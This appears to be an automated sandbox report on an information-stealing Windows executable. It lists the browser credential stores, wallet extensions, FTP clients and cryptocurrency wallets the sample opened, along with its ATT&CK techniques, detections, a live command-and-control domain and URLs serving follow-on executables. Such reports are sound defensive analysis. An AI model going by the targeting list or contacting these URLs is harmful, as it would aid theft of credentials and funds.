              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2125480427.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2186454577.0000000000D5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2182976016.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2086754787.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2153552340.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2186353361.0000000000D54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2182683548.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154012568.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2211110090.0000000000D5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 828, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 828, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              Registry Run Keys / Startup Folder
              12
              Process Injection
              1
              Masquerading
              2
              OS Credential Dumping
              1
              Query Registry
              Remote Services41
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading
              1
              Registry Run Keys / Startup Folder
              34
              Virtualization/Sandbox Evasion
              LSASS Memory751
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media11
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              12
              Process Injection
              Security Account Manager34
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
              Obfuscated Files or Information
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials223
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe34%ReversingLabsWin32.Trojan.Generic
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://property-imper.sbs/::0%Avira URL Cloudsafe
              https://property-imper.sbs:443/apiicrosoft0%Avira URL Cloudsafe
              http://185.2150%Avira URL Cloudsafe
              https://property-imper.sbs/h0%Avira URL Cloudsafe
              https://property-imper.sbs/CC0%Avira URL Cloudsafe
              https://property-imper.sbs/$v6/0%Avira URL Cloudsafe
              https://property-imper.sbs/api;E0%Avira URL Cloudsafe
              https://property-imper.sbs/550%Avira URL Cloudsafe
              https://property-imper.sbs:443/apiK0%Avira URL Cloudsafe
              https://property-imper.sbs/apiy0%Avira URL Cloudsafe
              https://property-imper.sbs/apiN0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              property-imper.sbs
              172.67.162.84
              truefalse
                high
                www.google.com
                216.58.208.228
                truefalse
                  high
                  s-part-0035.t-0009.t-msedge.net
                  13.107.246.63
                  truefalse
                    high
                    js.monitor.azure.com
                    unknown
                    unknownfalse
                      high
                      mdec.nelreports.net
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://property-imper.sbs/apifalse
                          high
                          https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_118.5.drfalse
                              high
                              https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2155942634.0000000005498000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_118.5.drfalse
                                      high
                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.file.exe, 00000000.00000003.2156013108.0000000005499000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155942634.0000000005498000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.linkedin.com/cws/share?url=$chromecache_110.5.dr, chromecache_101.5.drfalse
                                          high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://property-imper.sbs/CCfile.exe, 00000000.00000003.2125445564.0000000000D61000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://github.com/Youssef1313chromecache_118.5.drfalse
                                              high
                                              https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_110.5.dr, chromecache_101.5.drfalse
                                                high
                                                https://aka.ms/msignite_docs_bannerchromecache_110.5.dr, chromecache_101.5.drfalse
                                                  high
                                                  https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_101.5.drfalse
                                                    high
                                                    http://polymer.github.io/AUTHORS.txtchromecache_110.5.dr, chromecache_101.5.drfalse
                                                      high
                                                      https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_118.5.drfalse
                                                        high
                                                        https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_110.5.dr, chromecache_101.5.drfalse
                                                          high
                                                          https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_118.5.drfalse
                                                            high
                                                            http://x1.c.lencr.org/0file.exe, 00000000.00000003.2154466811.000000000549E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://x1.i.lencr.org/0file.exe, 00000000.00000003.2154466811.000000000549E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aka.ms/pshelpmechoosechromecache_110.5.dr, chromecache_101.5.drfalse
                                                                  high
                                                                  https://aka.ms/feedback/report?space=61chromecache_118.5.drfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://learn-video.azurefd.net/vod/playerchromecache_110.5.dr, chromecache_101.5.drfalse
                                                                        high
                                                                        https://property-imper.sbs/::file.exe, 00000000.00000003.2211337614.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://twitter.com/intent/tweet?original_referer=$chromecache_110.5.dr, chromecache_101.5.drfalse
                                                                          high
                                                                          https://github.com/gewarrenchromecache_118.5.drfalse
                                                                            high
                                                                            http://185.215file.exe, 00000000.00000003.2390528382.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://185.215.113.16/off/def.exepleWebKit/537.36file.exe, 00000000.00000002.2491785377.00000000007CB000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://property-imper.sbs/apiyfile.exe, 00000000.00000003.2153607750.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153552340.0000000000D79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2155584528.00000000055A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://polymer.github.io/CONTRIBUTORS.txtchromecache_110.5.dr, chromecache_101.5.drfalse
                                                                                  high
                                                                                  https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_118.5.drfalse
                                                                                    high
                                                                                    https://property-imper.sbs:443/apiicrosoftfile.exe, 00000000.00000003.2390528382.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_118.5.drfalse
                                                                                      high
                                                                                      https://client-api.arkoselabs.com/v2/api.jschromecache_110.5.dr, chromecache_101.5.drfalse
                                                                                        high
                                                                                        https://property-imper.sbs:443/apifile.exe, 00000000.00000003.2390528382.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_110.5.dr, chromecache_101.5.drfalse
                                                                                            high
                                                                                            https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_110.5.dr, chromecache_101.5.drfalse
                                                                                              high
                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://github.com/Thrakachromecache_118.5.drfalse
                                                                                                  high
                                                                                                  http://polymer.github.io/PATENTS.txtchromecache_110.5.dr, chromecache_101.5.drfalse
                                                                                                    high
                                                                                                    https://aka.ms/certhelpchromecache_110.5.dr, chromecache_101.5.drfalse
                                                                                                      high
                                                                                                      http://185.215.113.16/steam/random.exefile.exe, 00000000.00000003.2390528382.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492068192.0000000000CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2154466811.000000000549E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://github.com/mairawchromecache_118.5.drfalse
                                                                                                              high
                                                                                                              https://property-imper.sbs/55file.exe, 00000000.00000003.2153607750.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153552340.0000000000D79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2154466811.000000000549E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://schema.orgchromecache_101.5.drfalse
                                                                                                                  high
                                                                                                                  http://polymer.github.io/LICENSE.txtchromecache_110.5.dr, chromecache_101.5.drfalse
                                                                                                                    high
                                                                                                                    https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://31.41.244.11/files/rnd.exefile.exe, 00000000.00000003.2390528382.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492068192.0000000000CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctafile.exe, 00000000.00000003.2156013108.0000000005499000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155942634.0000000005498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://property-imper.sbs/file.exe, file.exe, 00000000.00000003.2295986206.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2295891028.0000000000D4B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2295891028.0000000000D3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2155584528.00000000055A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://aka.ms/yourcaliforniaprivacychoiceschromecache_118.5.drfalse
                                                                                                                                high
                                                                                                                                https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://github.com/nschonnichromecache_118.5.drfalse
                                                                                                                                    high
                                                                                                                                    https://property-imper.sbs/$v6/file.exe, 00000000.00000003.2182976016.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186353361.0000000000D54000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2182683548.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://property-imper.sbs/hfile.exe, 00000000.00000003.2295891028.0000000000D3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://property-imper.sbs/api;Efile.exe, 00000000.00000003.2186353361.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2470665012.0000000000D74000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2230156781.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2182683548.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2390336081.0000000000D75000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2182976016.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2182742660.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2211110090.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2316506779.0000000000D79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_110.5.dr, chromecache_101.5.drfalse
                                                                                                                                      high
                                                                                                                                      https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgfile.exe, 00000000.00000003.2156013108.0000000005499000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155942634.0000000005498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://github.com/adegeochromecache_118.5.drfalse
                                                                                                                                          high
                                                                                                                                          http://crl.microfile.exe, 00000000.00000003.2295891028.0000000000D3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.2156013108.0000000005499000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155942634.0000000005498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://185.215.113.16:80/off/def.exefile.exe, 00000000.00000003.2390528382.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://property-imper.sbs:443/apiKfile.exe, 00000000.00000003.2390528382.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://github.com/jonschlinkert/is-plain-objectchromecache_110.5.dr, chromecache_101.5.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://property-imper.sbs/apiNfile.exe, 00000000.00000003.2230156781.0000000000D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2154466811.000000000549E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://octokit.github.io/rest.js/#throttlingchromecache_110.5.dr, chromecache_101.5.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&reffile.exe, 00000000.00000003.2156013108.0000000005499000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155942634.0000000005498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://github.com/js-cookie/js-cookiechromecache_110.5.dr, chromecache_101.5.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477file.exe, 00000000.00000003.2156013108.0000000005499000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155942634.0000000005498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://185.215.113.16/off/def.exefile.exe, 00000000.00000003.2390528382.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492068192.0000000000CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://schema.org/Organizationchromecache_118.5.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://channel9.msdn.com/chromecache_110.5.dr, chromecache_101.5.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://github.com/dotnet/trychromecache_110.5.dr, chromecache_101.5.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                      • 75% < No. of IPs
